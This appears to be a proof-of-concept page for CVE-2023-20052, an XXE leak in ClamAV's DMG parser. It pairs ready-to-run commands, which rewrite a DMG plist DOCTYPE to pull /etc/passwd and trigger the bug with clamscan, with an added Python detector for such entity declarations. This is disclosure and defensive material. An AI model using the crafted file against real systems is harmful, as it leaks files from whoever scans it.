
CVE-2023-20052 PoC — ClamAV security vulnerability

Source
Associated Vulnerability
Title: ClamAV security vulnerability (CVE-2023-20052)
Description: ClamAV (Clam AntiVirus) is a free and open-source antivirus suite from the ClamAV team, used to detect trojans, viruses, malware and other malicious threats. ClamAV contains a security vulnerability stemming from XML external entity (XXE) injection; an unauthenticated remote attacker can exploit it to access sensitive information on an affected device.
Description
CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV
Readme
# CVE-2023-20052
CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Usage
To create a malicious DMG file:
```bash
git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg
```
![](https://raw.githubusercontent.com/nokn0wthing/CVE-2023-25002/main/1.png)

To trigger the exploit:
`clamscan --debug exploit.dmg`

![](https://raw.githubusercontent.com/nokn0wthing/CVE-2023-25002/main/2.png)
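The PoC works by rewriting the DOCTYPE of the XML property list that a DMG's `koly` trailer points at, so that the parser resolves an external entity when it reads the `blkx` key. The defender-side check below is an added example and is not part of the PoC repository or of ClamAV's own code: it locates the plist through the trailer, reports DTD constructs that make external entity injection possible (while leaving the stock Apple DOCTYPE, which merely references an external DTD, unreported), and refuses to hand such a document to the XML parser. The `koly` field layout (XML offset and length as big-endian u64 at byte 216 of the 512-byte trailer), the two sample plists and the DMG-shaped blob are my assumptions and constructed fixtures, not real disk images.

```python
import re
import struct
import xml.etree.ElementTree as ET

# Constructed fixture: the plist a DMG's "koly" trailer points at, with the stock Apple DOCTYPE.
BENIGN_PLIST = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" '
    b'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
    b'<plist version="1.0"><dict><key>resource-fork</key>'
    b'<dict><key>blkx</key><array/></dict></dict></plist>\n'
)

# Constructed fixture mirroring the DOCTYPE rewrite in the README above: an internal DTD
# subset declares an external (SYSTEM) entity and the document body references it.
XXE_PLIST = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>\n'
    b'<plist version="1.0"><dict><key>resource-fork</key>'
    b'<dict><key>&xxe;</key><array/></dict></dict></plist>\n'
)

DOCTYPE_RE = re.compile(rb'<!DOCTYPE\s+([\w.-]+)([^\[>]*)(?:\[(.*?)\])?\s*>', re.DOTALL)
ENTITY_RE = re.compile(rb'<!ENTITY\s+(%\s*)?([A-Za-z_][\w.-]*)\s+(SYSTEM|PUBLIC)?', re.DOTALL)
KOLY_SIZE = 512
KOLY_XML_FIELDS = 216  # assumed offset of xmlOffset/xmlLength (u64 BE) inside the koly block


def find_dtd_risks(xml: bytes) -> list:
    """Report DTD constructs that enable XXE. A DOCTYPE that only references an external
    DTD (the normal Apple plist header) is not reported: a correctly configured parser
    never fetches it. An internal subset declaring entities is reported by kind."""
    findings = []
    m = DOCTYPE_RE.search(xml)
    if m is None or m.group(3) is None:
        return findings
    internal = m.group(3)
    for pct, name, ext in ENTITY_RE.findall(internal):
        label = name.decode("ascii", "replace")
        if pct:
            findings.append(f"parameter entity %{label}; declared in internal subset")
        elif ext:
            findings.append(f"external entity &{label}; ({ext.decode()}) declared in internal subset")
        else:
            findings.append(f"internal entity &{label}; declared in internal subset")
    if internal.strip() and not findings:
        findings.append("non-empty internal DTD subset present")
    return findings


def safe_parse_plist(xml: bytes) -> ET.Element:
    """Refuse risky DTD content before the document reaches the XML parser."""
    risks = find_dtd_risks(xml)
    if risks:
        raise ValueError("refusing to parse plist: " + "; ".join(risks))
    return ET.fromstring(xml)


def build_koly_trailer(xml_offset: int, xml_length: int) -> bytes:
    """Pack a minimal big-endian koly trailer that carries only the XML offset/length."""
    head = struct.pack(">4sIII5QII16sII32I", b"koly", 4, KOLY_SIZE, 1,
                       0, 0, 0, 0, 0, 0, 1, b"\0" * 16, 0, 0, *([0] * 32))
    assert len(head) == KOLY_XML_FIELDS
    return (head + struct.pack(">QQ", xml_offset, xml_length)).ljust(KOLY_SIZE, b"\0")


def build_sample_dmg(xml: bytes) -> bytes:
    """Constructed DMG-shaped blob: placeholder data fork, then the plist, then the trailer."""
    data_fork = b"\0" * 64
    return data_fork + xml + build_koly_trailer(len(data_fork), len(xml))


def extract_plist(dmg: bytes) -> bytes:
    """Locate the XML plist through the koly trailer at the end of the image."""
    if len(dmg) < KOLY_SIZE:
        raise ValueError("too short to carry a koly trailer")
    trailer = dmg[-KOLY_SIZE:]
    if trailer[:4] != b"koly":
        raise ValueError("no koly magic at end of file")
    xml_offset, xml_length = struct.unpack_from(">QQ", trailer, KOLY_XML_FIELDS)
    if xml_offset + xml_length > len(dmg) - KOLY_SIZE:
        raise ValueError("XML region runs past the data area")
    return dmg[xml_offset:xml_offset + xml_length]


def scan_dmg(dmg: bytes) -> list:
    """Full check: pull the plist out of the image and report DTD risks."""
    return find_dtd_risks(extract_plist(dmg))


if __name__ == "__main__":
    for label, blob in (("benign", build_sample_dmg(BENIGN_PLIST)),
                        ("xxe", build_sample_dmg(XXE_PLIST))):
        print(label, scan_dmg(blob) or "no DTD risks")
```

The internal-subset regex stops at the first `]`, so a subset containing that character inside a quoted literal is truncated; for a production filter the right fix is still the one ClamAV shipped, configuring the XML library not to load DTDs or substitute entities, with a pre-parse check like this one as a detection signal rather than the only control.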

File Snapshot

[4.0K] /data/pocs/44da006490a122d9db42a85b116cb5bef05a576a
├── [ 24K] 1.png
├── [ 22K] 2.png
├── [ 556] Dockerfile
└── [ 859] README.md

0 directories, 4 files